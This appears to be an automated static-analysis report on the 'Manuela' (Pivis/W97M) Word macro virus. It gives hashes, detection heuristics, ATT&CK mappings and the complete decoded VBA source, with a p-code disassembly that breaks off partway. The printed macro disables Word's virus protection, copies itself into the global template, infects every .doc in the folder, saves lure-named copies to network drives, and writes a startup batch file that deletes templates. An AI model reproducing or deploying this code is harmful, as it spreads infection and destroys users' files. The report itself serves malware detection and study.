Pivis — Office (OLE) malware analysis

Static analysis result for SHA-256 369914a3a0cbe098…

MALICIOUS

Office (OLE)

74.0 KB Created: 1998-11-02 09:24:00 Authoring application: Microsoft Word 8.0 First seen: 2015-09-22
MD5: 6b5f7b841fe8c549f68edc8822758590 SHA-1: 327000d3ace4bc9522e0251a13f21adfa9093b58 SHA-256: 369914a3a0cbe098628c69091f4703ae7b7195fdfca53878449b18ce3fef2e2c
256 Risk Score

Malware Insights

Pivis · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1566.001 Spearphishing Attachment

The sample exhibits critical heuristics for VBA macro viruses, including disabling macro protection and replication markers. The embedded VBA macro, named 'Manuela', attempts to export itself to 'c:\Manuela.drv' and disables virus protection, indicating a malicious intent to execute further stages or persist. The ClamAV detections further confirm its malicious nature.

Heuristics 6

  • ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Options.VirusProtection = False
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 64199 bytes
SHA-256: 739c727198522af1806aace5b71c3fb1b22717618ad574df9fd64382755c25d4
Detection
ClamAV: Doc.Trojan.Vmpc-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Manuela"
    
Sub Manuela()
On Error Resume Next
Randomize
sv = Int(Rnd * 3) + 1
If sv = 1 Then svt$ = "porno.doc"
If sv = 3 Then svt$ = "readme!.doc"
If sv = 2 Then svt$ = "sex.doc"
UsEoVgKv = UiUt11709 & HmIn7730
IpUi10290 = UiUt11709 & BqTe6576 & Int(Rnd * 7793)
RrVn3588 = DvTzRjCg & KzQz9188 & Int(Rnd * 2527)
RrVn3588 = KhIu7369 & KzQz9188 & Int(Rnd * 3812)
UnTz3410 = GeKe14820 & VsLi17336 & Int(Rnd * 8167)
KhTuQjTw = GlUe9172 & GnMs9323
MpTq4803 = GlUe9172 & HuGm14936 & Int(Rnd * 7863)
Options.ConfirmConversions = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
VBE.ActiveVBProject.VBComponents("Manuela").Export "c:\Manuela.drv"
RpUe6243 = QqIkQqAo & NuJn4083 & Int(Rnd * 724)
RpUe6243 = EoJu2364 & NuJn4083 & Int(Rnd * 955)
CgHz8684 = LqQwJzEu & EgEp14649 & RqOwRqEw & HpDx11314
CgHz8684 = HpDx11314 & EgEp14649 & Int(Rnd * 4211)
QwBk4696 = HvVzMwFv & MfSi12772 & Int(Rnd * 5161)
QwBk4696 = AiGg6151 & MfSi12772 & Int(Rnd * 5920)
ActiveDocument.ReadOnlyRecommended = False
BfFqMuRo = IgNj8349 & RfGh13422
ShLs17516 = IgNj8349 & GjBf10447 & Int(Rnd * 3554)
OqFnThCr = MqOj10739 & PiRy8200
IhJv11053 = MqOj10739 & AwEf5529 & Int(Rnd * 3766)
HxHq9017 = IoJwEsKi & IeGm10210 & Int(Rnd * 5916)
HxHq9017 = PrQi5723 & IeGm10210 & Int(Rnd * 5193)
LqUr11219 = BhQyRpKv & OkQo8309 & LlDjRmOm & FgUm7944
LqUr11219 = FgUm7944 & OkQo8309 & Int(Rnd * 4257)
InOt19088 = AxOkTlAh & DtBe9899 & Int(Rnd * 9096)
InOt19088 = NqAz15248 & DtBe9899 & Int(Rnd * 8894)
DqFg = Int(Rnd * 100)
    If DqFg = 99 Then MsgBox "Perfect !", vbSystemModal
NuGuIkOs = BsVz15822 & JsVu10684
BpNo9123 = BsVz15822 & MiEh7405 & Int(Rnd * 7365)
UtSz6230 = OeMpMlGw & CmEt10041 & Int(Rnd * 290)
UtSz6230 = RvIf14097 & CmEt10041 & Int(Rnd * 6030)
ArMzMqBz = EgNj3704 & GzJf11337
OkFu4624 = EgNj3704 & EyLi8116 & Int(Rnd * 2448)
If Month(Now()) = 12 Then Call FqFl1072DzRp
MnCfFnGx = UgMy8855 & AwJk11076
UmJr13920 = UgMy8855 & CnGn9780 & Int(Rnd * 5023)
TfCk8028 = BiPh2384 & IeSk2892 & Int(Rnd * 410)
GtRvTtCg = HnIm13951 & MgQz12329
PuOp14278 = HnIm13951 & CgQz13483 & Int(Rnd * 6312)
FgAf7053 = HxGkJkDo & UnNz9612 & Int(Rnd * 5350)
FgAf7053 = SpPw7311 & UnNz9612 & Int(Rnd * 551)
NqNt9587 = ToGlRxKo & HqDx3271 & Int(Rnd * 1178)
NqNt9587 = QgKl3940 & HqDx3271 & Int(Rnd * 597)
FgDg3981 = MpUsClFx & UiIt10397 & Int(Rnd * 3575)
FgDg3981 = HpEh13037 & UiIt10397 & Int(Rnd * 3571)
If Month(Now()) = 7 And Day(Now()) = 17 Then MsgBox "Manuela is 17 !!!", vbInformation, "Birthday Greeting!!!"
HfCf7564 = FeRgLgHn & NsUr7025 & Int(Rnd * 3210)
HfCf7564 = IuEw14266 & NsUr7025 & Int(Rnd * 7177)
MjEhRqIn = QtMj15010 & DnAw7002
IlHm6528 = QtMj15010 & GjNz3128 & Int(Rnd * 8770)
With Dialogs(wdDialogFileSummaryInfo)
    .Author = "Readme"
    .Subject = " "
    .Execute
End With
KzOyCnDq = SwDq13116 & RqCx14208
TiFu12301 = SwDq13116 & GgUr18781 & Int(Rnd * 6287)
EqPy16979 = OoCvQsOo & DuSl9923 & Int(Rnd * 4935)
EqPy16979 = UqJe7784 & DuSl9923 & Int(Rnd * 6849)
EeAs9706 = TsSqHrBw & AhGn14505 & KoLmKtTl & LxQv12305
EeAs9706 = LxQv12305 & AhGn14505 & Int(Rnd * 7693)
FoRmBeTe = ArEp16803 & HeTv12433
DfDt13051 = ArEp16803 & HoLj18663 & Int(Rnd * 7107)
 JoUr5819$ = "c:\windows\startm~1\programs\startup\msfile.bat"
JnIv13873 = BlMj10017 & DpUp8234 & Int(Rnd * 1629)
IsPu18836 = SzQfOqCw & GiLj3390 & Int(Rnd * 9111)
IsPu18836 = NlJm10253 & GiLj3390 & Int(Rnd * 9777)
VhEq10723706 = GetAttr(NormalTemplate.FullName)
JjRvUiGi = AuBr14435 & TiBi12094
PmIi8897 = AuBr14435 & CzNo14007 & Int(Rnd * 8325)
CmJe8433 = HtSrEiGn & HrPu8140 & CyRmAqPy & HkMj6319
CmJe8433 = HkMj6319 & HrPu8140 & Int(Rnd * 5094)
If VhEq10723706 = vbReadOnly And System.OperatingSystem = "Windows" And System.LanguageDesignation = "English(United States)" Then Call vBitchES(JoUr5819$)
SzBx10683 = IhKoOhHm & LvLu7785 & IpDuUnAk & QqQh17377
SzBx10683 = QqQh17377 & LvLu7785 & Int(Rnd * 7552)
EjEp7743 = MyDq6814 & CeDm8876 & Int(Rnd * 2822)
If VhEq10723706 = vbReadOnly + vbArchive And System.OperatingSystem = "Windows" And System.LanguageDesignation = "English(United States)" Then Call vBitchES(JoUr5819$)
QjHv15134 = QlCj10659 & UiSw5528 & Int(Rnd * 9074)
FsAgQfJm = VtOx9926 & SmAu7969
PhEl10861 = VtOx9926 & AgQp9636 & Int(Rnd * 3197)
If VhEq10723706 = vbReadOnly Then GoTo MtHfKhDn
LhEy6349 = PhBuCfTi & RyIi11276 & Int(Rnd * 9225)
LhEy6349 = MqOp12462 & RyIi11276 & Int(Rnd * 3126)
MjFl13695 = CnMoEuVv & OiPu16382 & Int(Rnd * 4649)
MjFl13695 = TiNq7469 & OiPu16382 & Int(Rnd * 5984)
If VhEq10723706 = vbReadOnly + vbArchive Then GoTo MtHfKhDn
BpCxViFl = NtTm14604 & KlBl10162
BuPl10231 = NtTm14604 & OkGm10989 & Int(Rnd * 9473)
TnKs10337 = TzSrViSh & IzQq3154 & OrJrFqAm & TxLk7627
TnKs10337 = TxLk7627 & IzQq3154 & Int(Rnd * 1417)
RvTz9063 = GeTsRuBu & PnDy16787 & GePrRnTz & PkHu11639
RvTz9063 = PkHu11639 & PnDy16787 & Int(Rnd * 8816)
LuSh6694 = EmQrRfJn & TuDn5909 & Int(Rnd * 794)
LuSh6694 = JjTm12214 & TuDn5909 & Int(Rnd * 9261)
If NormalTemplate.VBProject.VBComponents.Item("Manuela").Name <> "Manuela" Then FtRy370638518 = True
FpOx10562 = HzUjCnQe & SiIj16550 & Int(Rnd * 8456)
FpOx10562 = VvKs9013 & SiIj16550 & Int(Rnd * 456)
GkEy8671 = IeTfFtKg & PuVv10609 & Int(Rnd * 1327)
GkEy8671 = UvCi13049 & PuVv10609 & Int(Rnd * 9286)
If ActiveDocument.VBProject.VBComponents.Item("Manuela").Name <> "Manuela" Then QkRj385111 = True
GfVf10635 = TvQo8539 & NxDw16238 & Int(Rnd * 4157)
PwRz8552 = HxIwQzTu & AiSk9375 & Int(Rnd * 186)
PwRz8552 = CfSu4684 & AiSk9375 & Int(Rnd * 2190)
If FtRy370638518 = True And QkRj385111 = False Then Set RjKp3851370613 = NormalTemplate.VBProject.VBComponents
If FtRy370638518 = False And QkRj385111 = True Then Set RjKp3851370613 = ActiveDocument.VBProject.VBComponents
RjKp3851370613.import "c:\Manuela.drv"
RwEzDhSt = JsQo1144 & RsUh8491
QyBo9753 = JsQo1144 & UfPl6052 & Int(Rnd * 1088)
NoMj12241 = JiRsQiHx & KlSl8166 & EjAvKpHx & KoLk8934
NoMj12241 = KoLk8934 & KlSl8166 & Int(Rnd * 7739)
If activeinst = False Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
QrPg17444 = ExFxVmQf & UgQf5790 & EqEoOnPs & NeUl5902
QrPg17444 = NeUl5902 & UgQf5790 & Int(Rnd * 82)
KmHv7457 = ShEuTsVx & SzKn4861 & EyDzMwMe & CrMy11245
KmHv7457 = CrMy11245 & SzKn4861 & Int(Rnd * 5235)
KzUe7802 = HmSqMrLg & VvFr9493 & UwUhFtMx & VkRv10997
KzUe7802 = VkRv10997 & VvFr9493 & Int(Rnd * 1371)
HzFqEeAl = BxNx12541 & MkDj9301
EjHq14670 = BxNx12541 & DwUg9662 & Int(Rnd * 5842)
If QkRj385111 = False Then If NormalTemplate.Saved = False Then NormalTemplate.Save
JvSi3111 = LxThJkGx & EjNp9281 & Int(Rnd * 7272)
JvSi3111 = IzSu10985 & EjNp9281 & Int(Rnd * 5655)
VuKfPlQj = IxBy11899 & SjFo13687
TnIr13409 = IxBy11899 & IhVv12367 & Int(Rnd * 8396)
CkIq11087 = UnIyCpDv & KlIi3035 & Int(Rnd * 5827)
CkIq11087 = AsNj11312 & KlIi3035 & Int(Rnd * 2236)
HoOx14146 = AfKl10241 & LsUg3178 & Int(Rnd * 4062)
'VMPCK v1.0d [The Final Version?]
MtHfKhDn:
End Sub
Sub HelpAbout()
    On Error Resume Next
PnLj15824 = CtOfCzKn & DvIj14792 & CgQkKnMl & LtLz10162
PnLj15824 = LtLz10162 & DvIj14792 & Int(Rnd * 1346)
SxUn6409 = VyGv6646 & NtKo11893 & Int(Rnd * 1675)
    MsgBox "Do you love me ?", vbInformation
AjFh13229 = MfImVeTi & TwQe10515 & CrNuTtHh & EuDi9351
AjFh13229 = EuDi9351 & TwQe10515 & Int(Rnd * 2752)
HgKkUfMt = BzBj5665 & BtGi14835
QmIi12480 = BzBj5665 & RnDm10634 & Int(Rnd * 1932)
End Sub
Sub FileExit()
    On Error Resume Next
EsNk17397 = PiUt7063 & AiIh14244 & Int(Rnd * 6686)
FhTqDlDh = OuGg9115 & LhBw4288
AzUi8266 = OuGg9115 & QhDl5360 & Int(Rnd * 4603)
    Call Manuela
BmThGiQz = OrJe11482 & VzUn14626
KsOt12420 = OrJe11482 & VsBg10017 & Int(Rnd * 3384)
EpLkTrIq = IsJe15179 & QrAz15070
QtNp17861 = IsJe15179 & RqGx10110 & Int(Rnd * 9918)
    If ActiveDocument.Saved = False Then ActiveDocument.Save
OiHm14206 = AqBkGqDu & HoVm13794 & AsFhHnJf & JnCq4425
OiHm14206 = JnCq4425 & HoVm13794 & Int(Rnd * 2611)
DmLe15360 = MlKeTjHw & InJp18925 & Int(Rnd * 8959)
DmLe15360 = SkAr12045 & InJp18925 & Int(Rnd * 8113)
Application.WindowState = wdWindowStateMinimize
pName = CurDir & "\"
fName = Dir(pName & "*.doc", sAttr)
If (fName <> "") And ((fName <> ".") And (fName <> "..")) Then InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
Call Manuela
Do While (fName <> "")
fName = Dir()
If (fName <> "") And _
((fName <> ".") And (fName <> "..")) Then
InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
    Call Manuela
End If
Loop
        ChangeFileOpenDirectory "p:"
        ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
        ChangeFileOpenDirectory "h:"
        ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
        ChangeFileOpenDirectory "f:"
        ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
    Application.Quit
LpBr9938 = NoBv9802 & AeSk7435 & Int(Rnd * 6989)
GpSh11570 = ElBu886 & QiUo7504 & Int(Rnd * 879)
End Sub
Sub AutoOpen()
    On Error Resume Next
GnUu11153 = GlLwPyVw & TuIs13183 & Int(Rnd * 4407)
GnUu11153 = JsNg1606 & TuIs13183 & Int(Rnd * 1041)
PjRnPnJm = CwBo8426 & DhGn7674
DrUi4404 = CwBo8426 & IkSt14249 & Int(Rnd * 3665)
    Call Manuela
SeJh15034 = BjOlUrMj & QgGw12896 & Int(Rnd * 5058)
SeJh15034 = KwSy13747 & QgGw12896 & Int(Rnd * 7388)
VyNwDsLm = DpVi18584 & LhUz13522
KuDo11046 = DpVi18584 & CfUp11020 & Int(Rnd * 9098)
End Sub
Sub AutoExit()
    On Error Resume Next
DxFlFpDf = LmGl10782 & HvQn15792
MfNw13866 = LmGl10782 & SkDm8694 & Int(Rnd * 6731)
CfKe17403 = ExRmUlEq & NwGl3776 & QmGjMyKi & PxGk13172
CfKe17403 = PxGk13172 & NwGl3776 & Int(Rnd * 6943)
    Call Manuela
NxQlCwCu = NyIy11786 & PpIt11981
PzGu7178 = NyIy11786 & DrPs10377 & Int(Rnd * 7904)
OhEfKhBz = InMn10377 & PtRz8953
EoVv7570 = InMn10377 & EkSv6556 & Int(Rnd * 7434)
Application.WindowState = wdWindowStateMinimize
pName = CurDir & "\"
fName = Dir(pName & "*.doc", sAttr)
If (fName <> "") And ((fName <> ".") And (fName <> "..")) Then InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
Call Manuela
Do While (fName <> "")
fName = Dir()
If (fName <> "") And _
((fName <> ".") And (fName <> "..")) Then
InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
    Call Manuela
End If
Loop
    If ActiveDocument.Saved = False Then ActiveDocument.Save
        ChangeFileOpenDirectory "p:"
        ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
        ChangeFileOpenDirectory "r:"
        ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
        ChangeFileOpenDirectory "s:"
        ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
End Sub
Sub AutoExec()
    On Error Resume Next
BlPx5440 = QxOe7683 & PtDk8146 & Int(Rnd * 2073)
BtVwFmJq = NsGz2013 & LkAn18533
OeMw17449 = NsGz2013 & LuOj15321 & Int(Rnd * 339)
    Call Manuela
EmPk6368 = PkTxSnNw & GnVu9879 & Int(Rnd * 6892)
EmPk6368 = BvOt13917 & GnVu9879 & Int(Rnd * 8536)
LqEfJsSx = PgUi9892 & HrLu9187
EvFg12950 = PgUi9892 & EnVk6032 & Int(Rnd * 5421)
End Sub
Sub AutoClose()
    On Error Resume Next
BnRiCpAv = KgTy15044 & CoKz8926
LxJz12248 = KgTy15044 & ByQp7696 & Int(Rnd * 7996)
JqBr6355 = MiAh8573 & HqGm10808 & Int(Rnd * 3383)
    Call Manuela
FjNw12605 = VpFrDpNu & BrEf1400 & RsKxQvTz & SmPl10140
FjNw12605 = SmPl10140 & BrEf1400 & Int(Rnd * 9285)
RrAn5380 = MoGhNqBo & TyBf7528 & Int(Rnd * 6625)
RrAn5380 = HpAv13499 & TyBf7528 & Int(Rnd * 3524)
End Sub
Sub ToolsMacro()
    On Error Resume Next
EfMe17914 = CeGiAhIp & GgNz11188 & Int(Rnd * 2454)
EfMe17914 = FgRk10128 & GgNz11188 & Int(Rnd * 3570)
RrCn12307 = SgUqGrDx & TuSv8314 & Int(Rnd * 4784)
RrCn12307 = SpLh9227 & TuSv8314 & Int(Rnd * 6544)
    Call Manuela
TqBn5891 = LrRzPmFn & MiIt14940 & Int(Rnd * 4419)
TqBn5891 = TuLw456 & MiIt14940 & Int(Rnd * 151)
BjSkOsDl = GtTj11200 & EfBo14853
UwGt14855 = GtTj11200 & FvBf11045 & Int(Rnd * 1744)
KtFf10628 = QxBhPwMf & FrIt6700 & VyGfVpTo & IwKp9305
KtFf10628 = IwKp9305 & FrIt6700 & Int(Rnd * 9260)
JjNj17118 = PvJiVuVo & HvNn9761 & GhDiLyGe & FqPs17602
JjNj17118 = FqPs17602 & HvNn9761 & Int(Rnd * 9355)
MsgBox "Word Basic Err =7"
QpVz8034 = DiSoLxVx & VsQp12422 & UoDoHvNj & BxBv8494
QpVz8034 = BxBv8494 & VsQp12422 & Int(Rnd * 667)
ItAe13189 = GrKh16622 & LqGl8502 & Int(Rnd * 9613)
End Sub
Sub FileTemplates()
    On Error Resume Next
VyHh12201 = MlTj6207 & CfIr6151 & Int(Rnd * 4602)
VhOf7165 = CqQySwAx & FtVl11306 & Int(Rnd * 321)
VhOf7165 = ClQl6443 & FtVl11306 & Int(Rnd * 2751)
    Call Manuela
TjJxRkBg = LuIr10625 & VwCx9944
FxIq17223 = LuIr10625 & BoBq11923 & Int(Rnd * 1299)
PxIl16759 = NjToIoEn & GhDw6058 & NyJpTsKw & SkTj12507
PxIl16759 = SkTj12507 & GhDw6058 & Int(Rnd * 8066)
IoBi9010 = OuKlSnFn & KkVw5702 & ToSxRoQh & GqBh3568
IoBi9010 = GqBh3568 & KkVw5702 & Int(Rnd * 526)
QuEx6070 = CxKp13003 & BpNo16792 & Int(Rnd * 5795)
MsgBox "Word Basic Err =7"
GuGg13462 = GlJi6848 & TtGy13444 & Int(Rnd * 2048)
QrOjNhEk = KtVw16115 & UeBn5820
FsDs9189 = KtVw16115 & VrEr7554 & Int(Rnd * 6170)
End Sub
Sub ViewVBCode()
    On Error Resume Next
BsEk14676 = VuCrGlRi & QnSk9193 & Int(Rnd * 502)
BsEk14676 = BpVp8652 & QnSk9193 & Int(Rnd * 6099)
CuFt12022 = IzMlIeUw & NtDw14298 & Int(Rnd * 5858)
CuFt12022 = IiUp13657 & NtDw14298 & Int(Rnd * 8956)
    Call Manuela
LpReSkAj = CtEl10794 & MzCe8013
NjOs8558 = CtEl10794 & NvQo8907 & Int(Rnd * 2447)
JyKz8665 = DpSpDoQh & IoEs11069 & CqBtCrRk & JxSk13815
JyKz8665 = JxSk13815 & IoEs11069 & Int(Rnd * 4390)
PzNuMqAr = VkNn1461 & QmQz8065
AoRl9201 = VkNn1461 & TpUz16624 & Int(Rnd * 1324)
MsgBox "Word Basic Err =7"
BjRp5022 = KyQoAlHn & SjNp3825 & Int(Rnd * 2069)
BjRp5022 = VjEm8404 & SjNp3825 & Int(Rnd * 2235)
FeStKvMp = GvQl8833 & RkFx14514
LiMj10701 = GvQl8833 & AkDk6388 & Int(Rnd * 2963)
End Sub
Sub FqFl1072DzRp()
    On Error Resume Next
SvEk6998 = OrUzKzIh & OjJx8526 & Int(Rnd * 2602)
SvEk6998 = JvJi9239 & OjJx8526 & Int(Rnd * 2260)
TqVm8963 = IuBo14728 & MmNy4156 & Int(Rnd * 7130)
        Selection.HomeKey Unit:=wdStory
        Selection.Find.ClearFormatting
        Selection.Find.Replacement.ClearFormatting
        With Selection.Find
            .Text = ". "
            .Replacement.Text = ". Manuela said:"
            .Forward = True
            .Wrap = wdFindContinue
            .Format = False
            .MatchCase = False
            .MatchWholeWord = True
            .MatchAllWordForms = False
        End With
        Selection.Find.Execute Replace:=wdReplaceAll
FlRk6879 = NnItUjRv & VtGm17291 & Int(Rnd * 1395)
FlRk6879 = OeDu10873 & VtGm17291 & Int(Rnd * 5163)
VrVv9891 = HtKtJvJi & CgJm5889 & Int(Rnd * 2987)
VrVv9891 = QsAg10963 & CgJm5889 & Int(Rnd * 3595)
CommandBars("edit").Controls("Undo VBA-Find.Execute").Delete
SgJr12379 = LpDeVkOx & OmNm8002 & Int(Rnd * 7964)
SgJr12379 = QoRz8754 & OmNm8002 & Int(Rnd * 247)
NoCrIqTk = TeEe5721 & LfKq11198
VjNo17582 = TeEe5721 & ChLg5627 & Int(Rnd * 2588)
CommandBars("edit").Controls("Repeat Replace...").Delete
BxGg15784 = CuErByTx & RpUp12778 & OxRgJyHx & NqTx17434
BxGg15784 = NqTx17434 & RpUp12778 & Int(Rnd * 8208)
AoTm6130 = NySnQxJh & UkPt7410 & IvMkCvHv & KkCu7187
AoTm6130 = KkCu7187 & UkPt7410 & Int(Rnd * 4344)
CommandBars("edit").Controls("Replace...").Delete
JxEx14808 = IxTq12361 & HxPh9498 & Int(Rnd * 8349)
AiArLeKr = UzDu17174 & KlHj10493
VkSp11439 = UzDu17174 & DvBr17197 & Int(Rnd * 8628)
If ActiveDocument.Saved = False Then ActiveDocument.Save
End Sub
    
Sub vBitchES(strFile As String)
    
Dim hFile As Long
On Error Resume Next
JyHy11736 = TxEgKnOu & HtJx10284 & Int(Rnd * 6932)
JyHy11736 = TxIy8089 & HtJx10284 & Int(Rnd * 1370)
SiJv7437 = DyFk13745 & AmKp11280 & Int(Rnd * 5413)
n$ = NormalTemplate
QqNf12307 = UmCf16305 & GjGm3346 & Int(Rnd * 6773)
BoLn13986 = KgUfOnFx & UlRp4960 & DxAhBjIt & JfDt6227
BoLn13986 = JfDt6227 & UlRp4960 & Int(Rnd * 4057)
Part11$ = "attrib -h -r "
LvVr12759 = GyGwIfMw & DuLv10140 & Int(Rnd * 2849)
LvVr12759 = CjUw9079 & DuLv10140 & Int(Rnd * 4852)
EnOqMnPu = HfRk11784 & DxMn15430
PhHl9580 = HfRk11784 & JwSl18761 & Int(Rnd * 5929)
snag$ = "c:\progra~1\micros~1\templa~1\"
JyLgMwUk = EkPl8099 & NnRo17206
KkJm8831 = EkPl8099 & IoFt18880 & Int(Rnd * 5110)
UqPp13747 = IvTrNyBi & MjKo12490 & Int(Rnd * 9825)
UqPp13747 = SpMu19495 & MjKo12490 & Int(Rnd * 9864)
snag1$ = "c:\progra~1\micros~2\templa~1\"
QxVn4617 = KnUgGeAi & GhFs13606 & HzUmSgLu & RfUi11548
QxVn4617 = RfUi11548 & GhFs13606 & Int(Rnd * 7780)
EqQx8771 = BhLzLzNx & LtDn8264 & DiTzVyDr & RyBf13915
EqQx8771 = RyBf13915 & LtDn8264 & Int(Rnd * 6561)
Part2$ = "del "
KrPt14212 = UhAsSsEu & HrIi8357 & Int(Rnd * 720)
KrPt14212 = LzBf7613 & HrIi8357 & Int(Rnd * 3096)
AkGq12366 = IzHjSeUi & DeIs13961 & BmLzUjFn & HuQk10488
AkGq12366 = HuQk10488 & DeIs13961 & Int(Rnd * 5321)
hFile = FreeFile
Open strFile For Output Access Write As hFile
Print #hFile, "@echo off"
Print #hFile, Part11$ + snag$ + n$
Print #hFile, Part11$ + snag1$ + n$
Print #hFile, Part2$ + snag$ + n$
Print #hFile, Part2$ + snag1$ + n$
Print #hFile, "cls"
Print #hFile, Part2$ + "c:\windows\startm~1\programs\startup\msfile.bat"
Close hFile
SpAuDrRn = QrOl8109 & SrDf9427
LoLj13522 = QrOl8109 & DzSv9093 & Int(Rnd * 825)
UqMo16819 = CgFiUxAv & MnPt11705 & Int(Rnd * 6962)
UqMo16819 = HqCm13769 & MnPt11705 & Int(Rnd * 6844)
KfQwFwKs = DmDs1222 & CvUm12741
BmKe16639 = DmDs1222 & BgKy9853 & Int(Rnd * 1200)
End Sub

' Processing file: /tmp/qstore_2uge51bb
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/Manuela - 27928 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Sub Manuela())
' Line #2:
' 	OnError (Resume Next) 
' Line #3:
' 	ArgsCall Read 0x0000 
' Line #4:
' 	Ld Rnd 
' 	LitDI2 0x0003 
' 	Mul 
' 	FnInt 
' 	LitDI2 0x0001 
' 	Add 
' 	St sv 
' Line #5:
' 	Ld sv 
' 	LitDI2 0x0001 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x0009 "porno.doc"
' 	St svt$ 
' 	EndIf 
' Line #6:
' 	Ld sv 
' 	LitDI2 0x0003 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x000B "readme!.doc"
' 	St svt$ 
' 	EndIf 
' Line #7:
' 	Ld sv 
' 	LitDI2 0x0002 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x0007 "sex.doc"
' 	St svt$ 
' 	EndIf 
' Line #8:
' 	Ld UiUt11709 
' 	Ld HmIn7730 
' 	Concat 
' 	St UsEoVgKv 
' Line #9:
' 	Ld UiUt11709 
' 	Ld BqTe6576 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x1E71 
' 	Mul 
' 	FnInt 
' 	Concat 
' 	St IpUi10290 
' Line #10:
' 	Ld DvTzRjCg 
' 	Ld KzQz9188 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x09DF 
' 	Mul 
' 	FnInt 
' 	Concat 
' 	St RrVn3588 
' Line #11:
' 	Ld KhIu7369 
' 	Ld KzQz9188 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x0EE4 
' 	Mul 
' 	FnInt 
' 	Concat 
' 	St RrVn3588 
' Line #12:
' 	Ld GeKe14820 
' 	Ld VsLi17336 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x1FE7 
' 	Mul 
' 	FnInt 
' 	Concat 
' 	St UnTz3410 
' Line #13:
' 	Ld GlUe9172 
' 	Ld GnMs9323 
' 	Concat 
' 	St KhTuQjTw 
' Line #14:
' 	Ld GlUe9172 
' 	Ld HuGm14936 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x1EB7 
' 	Mul 
' 	FnInt 
' 	Concat 
' 	St MpTq4803 
' Line #15:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt ConfirmConversions 
' Line #16:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #17:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #18:
' 	LitStr 0x000E "c:\Manuela.drv"
' 	LitStr 0x0007 "Manuela"
' 	Ld VBE 
' 	MemLd ActiveVBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	ArgsMemCall Export 0x0001 
' Line #19:
' 	Ld QqIkQqAo 
' 	Ld NuJn4083 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x02D4 
' 	Mul 
' 	FnInt 
' 	Concat 
' 	St RpUe6243 
' Line #20:
' 	Ld EoJu2364 
' 	Ld NuJn4083 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x03BB 
' 	Mul 
' 	FnInt 
' 	Concat 
' 	St RpUe6243 
' Line #21:
' 	Ld LqQwJzEu 
' 	Ld EgEp14649 
' 	Concat 
' 	Ld RqOwRqEw 
' 	Concat 
' 	Ld HpDx11314 
' 	Concat 
' 	St CgHz8684 
' Line #22:
' 	Ld HpDx11314 
' 	Ld EgEp14649 
' 	Concat 
